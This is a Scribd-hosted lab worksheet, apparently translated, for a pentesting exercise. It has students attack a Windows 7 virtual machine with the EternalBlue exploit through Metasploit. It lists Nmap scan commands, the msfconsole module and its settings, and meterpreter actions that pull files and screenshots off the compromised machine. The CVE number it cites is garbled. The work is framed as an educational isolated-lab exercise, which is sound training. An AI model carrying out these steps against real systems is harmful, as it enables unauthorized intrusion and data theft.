Scribd
Upload
63 views5 pages

Metasploit EternalBlue Pentesting Guide

This document describes a pentesting attack using Metasploit against a Windows 7 virtual machine. It explains how to scan the target machine with Nmap to find open ports, then use the EternalBlue exploit from Metasploit to gain remote shell access through the compromised SMB protocol. Once inside, the document shows how to create and download files and take screenshots of the attacked machine to verify access.

Uploaded by

ScribdTranslations
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
63 views5 pages

Metasploit EternalBlue Pentesting Guide

This document describes a pentesting attack using Metasploit against a Windows 7 virtual machine. It explains how to scan the target machine with Nmap to find open ports, then use the EternalBlue exploit from Metasploit to gain remote shell access through the compromised SMB protocol. Once inside, the document shows how to create and download files and take screenshots of the attacked machine to verify access.

Uploaded by

ScribdTranslations
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Pentesting Practice with Metasploit

In this practice, we will carry out an attack with Metasploit using the exploit of
Windows 7 known as EternalBlue. This exploit takes advantage of a vulnerability in the protocol
Windows SMB (port 445). This vulnerability, denoted as CVE-2017-014478 in the
Common Vulnerabilities and Exposures (CVE) catalog, is due to the fact that version 1 of the server
SMB (SMBv1) accepts specific packets in various versions of Microsoft Windows
remote attackers, allowing them to execute code on the targeted computer.
To carry out this attack, we will use a secure environment composed of two machines.
virtual: One with Kali Linux ([Link]) in any version and another with Windows 7 Service
Pack 1 in any edition ([Link])
To begin this attack, first we need to have both machines networked.
For this, we will ping between the machines.

As we can see, the Windows machine is not responding. This is because the firewall is
The default blocks ICMP entries as a security measure. Another obstacle it puts us in
the firewall in this case is to deny SMB requests, which does not happen in environments where
Files and printers are shared. Due to this, we will disable the firewall so that
the attack can be carried out successfully.
To disable the firewall, we must first go to the control panel. To do this, we will do
Click on the start button and we will press Control Panel in the right section of it.
Once in the control panel, we will go to the System and Security section.
Next, we will enter Windows Firewall.
Once here, in the left section, we will click on Enable or disable Firewalld
Windows.
Finally, we will deactivate the Firewall and click on Accept.
Once the machines "can be seen", we proceed to carry out the attack:

A. First, we are going to perform a port scan on the victim machine (W7) with
Nmap:
• Black box: We assume that we do not know the IP of the devices on the network, we scan
all the devices on the network with the following command: sudo nmap -O
[Link]/24(the -O option will also tell us what OS the scanned device is running)
What port or ports are open? What is the OS?

• White box: when we know the IP of the target device, operating system, etc.
the attacked machine, we scanned only it:
sudo nmap -sV -v -n [Link](ip of your Windows 7 machine)

For a more thorough scan: sudo nmap -sVC -sC --open -sS -vvv -n -Pn [Link]
Which ports are vulnerable?

We launch the Exploit to check that the Windows 7 machine has the
vulnerability
• We open Metasploit from the Kali console with the command: msfconsole
• Once opened, we will use the following command to search for the exploit: search
eternal
• In this case, we will use the second exploit (exploit/Windows/smb/ms17_010_eternalblue),
so we will write: use 2

• Once we have selected the exploit we will use, we type show options to see
the parameters used by the exploit

To set up this exploit, some parameters are mandatory and others are not, and in this case of the
we are missing the parameter RHOSTS (remote or targeted host-w7), which is the IP(s) that will be
attacked.

• To set the Windows machine as the target, we will write:set RHOST


target_ip([Link])
• Also check that the IP in the LHOST parameter (local-kali host) is the
correct ([Link])
Once these parameters are configured, review them again withshow optionsto check
that we have set the correct values.
Once this is done, you just need to run the exploit by typingexploit

Now we have access to the target machine through a shell. To see the commands that
we can use -> help:
meterpreter > help
We can use, for example: pwd, ls, cd, mkdir, edit filename
1. Using these commands, create a file on the desktop from the Kali machine.
attacked machine
2. Create a text file on the desktop of the Windows 7 machine and download it to the
Kali machine using the command download
3. Take a screenshot of the attacked machine with the [Link]
the file .jpeg created on the Kali machine and check the content of the capture.

Carry out the practice by explaining the process and taking screenshots of it.

You might also like